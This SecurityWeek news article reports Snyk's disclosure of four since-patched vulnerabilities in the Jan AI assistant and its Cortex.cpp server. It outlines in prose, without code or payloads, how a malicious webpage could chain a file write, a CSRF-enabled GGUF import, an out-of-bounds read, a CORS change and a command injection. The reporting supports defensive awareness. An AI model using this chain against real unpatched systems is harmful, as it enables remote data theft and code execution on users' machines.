Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Artificial Intelligence

Vulnerabilities Expose Jan AI Systems to Remote Manipulation

Vulnerabilities in open source ChatGPT alternative Jan AI expose systems to remote, unauthenticated manipulation.

Jan AI vulnerabilities

Multiple vulnerabilities in Jan AI, which is advertised as an open source ChatGPT alternative, could be exploited by remote, unauthenticated attackers to manipulate systems, developer security platform Snyk warns.

Developed by Menlo Research, Jan AI is a personal assistant that runs offline on desktops and mobile devices, featuring a model library with popular LLMs, and support for extensions for customization purposes.

Jan, which has over one million downloads on GitHub, allows users to download and run LLMs locally, without depending on cloud hosting services and benefiting from full control over the AI.

The assistant is powered by Menlo’s self-hosted AI engine Cortex.cpp, which functions as the backend API server, and has an Electron application as a user interface. Through Cortex, users can pull models from a dedicated hub and from HuggingFace, and can import local models stored in the GGUF file format.

Because Jan and Cortex are meant to operate locally, they lack authentication, meaning that they are prone to attacks originating from malicious webpages.

Snyk’s analysis of the AI assistant uncovered a function for uploading files to the server that lacked sanitization, which could be exploited by a malicious page to write arbitrary files to the machine.

Further investigation revealed out-of-bound issues in Jan’s GGUF parser, as well as the lack of cross-site request forgery (CSRF) protections on its server, which could be exploited on non-GET endpoints, despite Cortex having cross-origin resource sharing (CORS) implemented.

By exploiting the cross-origin arbitrary file write flaw, an attacker could write a crafted GGUF file to the server, and then exploit the lack of CSRF protection to import it and trigger an out-of-bounds read that enables the attacker to read data into a metadata field they control.

Advertisement. Scroll to continue reading.

By sending a cross-origin request, the attacker can update the server’s configuration and completely disable CORS, and then read back the leaked data by sending a request to the model’s metadata endpoint, Snyk says.

“Leaking data over the network with a GGUF file is pretty neat, but this doesn’t come without some limitations. We can’t control what gets mapped after our crafted model file; hence there’s no way to tell if we can leak sensitive data,” the security firm notes.

The AI was also found vulnerable to remote code execution (RCE), through Cortex.cpp’s support for python-engine. Because the engine is a C++ wrapper that executes the Python binary, an attacker can update the model configuration to inject a payload in the binary and trigger command execution when the model starts.

Snyk reported its findings to Menlo on February 18 and all issues were addressed by March 6. Four CVEs were issued: CVE-2025-2446 (arbitrary file write via path traversal), CVE-2025-2439 (out-of-bound read in GGUF parser), CVE-2025-2445 (command injection in Python engine model update), and CVE-2025-2447 (missing CSRF protection).

Related: New AI Security Tool Helps Organizations Set Trust Zones for Gen-AI Models

Related: New Jailbreak Technique Uses Fictional World to Manipulate AI

Related: New CCA Jailbreak Method Works Against Most AI Models

Related: Prompt Security Raises $18 Million for Gen-AI Security Platform

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this event as we dive into threat hunting tools and frameworks, and explore value of threat intelligence data in the defender’s security stack.

Register

Learn how integrating BAS and Automated Penetration Testing empowers security teams to quickly identify and validate threats, enabling prompt response and remediation.

Register

People on the Move

Wendi Whitmore has taken the role of Chief Security Intelligence Officer at Palo Alto Networks.

Phil Venables, former CISO of Google Cloud, has joined Ballistic Ventures as a Venture Partner.

David Currie, former CISO of Nubank and Klarna, has been appointed CEO of Vaultree.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.